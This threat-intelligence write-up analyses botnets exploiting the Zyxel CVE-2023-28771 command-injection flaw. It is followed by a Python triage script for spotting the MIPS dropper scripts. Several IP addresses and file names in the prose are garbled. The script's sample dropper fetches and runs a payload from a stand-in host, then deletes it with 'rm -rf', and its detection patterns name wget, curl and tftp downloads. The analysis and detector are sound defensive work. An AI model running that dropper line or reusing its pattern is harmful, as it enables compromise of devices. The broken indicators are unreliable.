Impact: Remote attackers gain control of the vulnerable systems

In June 2023, FortiGuard Labs detected the propagation of several DDoS botnets exploiting the Zyxel vulnerability (CVE-2023-28771). This vulnerability is a command injection flaw affecting multiple firewall models that could allow an unauthorized attacker to execute arbitrary code by sending a specially crafted packet to the targeted device.

Zyxel released a security advisory regarding this vulnerability on April 25, 2023. The flaw, rated 9.8 on the CVSS scoring system, was reported by researchers from TRAPA Security. Subsequently, the Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalog in May.

Analysis conducted by FortiGuard Labs identified a significant increase in attack bursts starting in May, as depicted in the trigger count graph in Figure 1. Since the publication of the exploit module, there has been a sustained surge in malicious activity. By capturing exploit traffic, we identified the attackers' IP addresses and determined that the attacks were occurring in multiple regions, including Central America, North America, East Asia, and South Asia.

We also identified multiple botnets, including Dark.IoT, a variant based on Mirai, as well as another botnet that employs customized DDoS attack methods. In this article, we provide a detailed explanation of the payload delivered through CVE-2023-28771 and the associated botnets.

The script files obtained in these attacks exclusively download files tailored for the MIPS architecture, indicating a highly specific target. In Figure 3, the script downloads a file named "lolmips" from the IP address 921183916 and saves it as ". Subsequently, it executes the file with the "zywall" parameter, indicating its connection to the Zyxel firewall vulnerability. The script file shown in Figure 4 was downloaded from 1712213615, which has been associated with the Rapperbot malware. However, we observed this script being forwarded to 1712213618, where it dropped additional MIPS files for subsequent actions. The script files in Figure 5 exhibit similar code patterns despite originating from different server IP addresses. These scripts employ the "rm -rf" command to remove the ".
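The dropper behaviour described above (fetch a MIPS-named payload, run it with the "zywall" argument, clean up with "rm -rf") can be turned into a simple triage check for captured scripts. The following Python is an added example, not code from FortiGuard Labs; the regexes are this example's own heuristics, and the sample script and the 192.0.2.10 documentation address are constructed, not indicators from the article.

```python
import re

# Heuristics for the behaviours the article attributes to the CVE-2023-28771
# dropper scripts (these patterns are this example's own, not FortiGuard's).
DOWNLOAD_RE = re.compile(
    r"\b(?:wget|curl|tftp)\b[^\n;|&]*?(https?://\S+|\b\d{1,3}(?:\.\d{1,3}){3}\b\S*)"
)
MIPS_NAME_RE = re.compile(r"mips", re.IGNORECASE)
ZYWALL_EXEC_RE = re.compile(r"\S+\s+zywall(?:\s|$)", re.MULTILINE)
CLEANUP_RE = re.compile(r"\brm\s+-rf?\s+\S+")


def triage_dropper_script(script_text: str) -> dict:
    """Return the indicators found in a captured shell script plus a verdict.

    The verdict is 'likely-mips-dropper' when at least two of the three
    behaviours are present: a MIPS-named download target, execution with the
    'zywall' argument, and 'rm -rf' cleanup.
    """
    download_targets = [m.group(1) for m in DOWNLOAD_RE.finditer(script_text)]
    mips_payloads = [t for t in download_targets if MIPS_NAME_RE.search(t)]
    findings = {
        "download_targets": download_targets,
        "mips_payloads": mips_payloads,
        "zywall_execution": bool(ZYWALL_EXEC_RE.search(script_text)),
        "rm_rf_cleanup": bool(CLEANUP_RE.search(script_text)),
    }
    score = sum(
        [bool(mips_payloads), findings["zywall_execution"], findings["rm_rf_cleanup"]]
    )
    findings["verdict"] = "likely-mips-dropper" if score >= 2 else "benign-or-inconclusive"
    return findings


# Constructed sample mimicking the behaviour described for Figure 3.
# 192.0.2.10 is a documentation address, not an indicator from the article.
SAMPLE_SCRIPT = """#!/bin/sh
cd /tmp
wget http://192.0.2.10/lolmips -O .x
chmod +x .x
./.x zywall
rm -rf .x
"""

if __name__ == "__main__":
    print(triage_dropper_script(SAMPLE_SCRIPT))
```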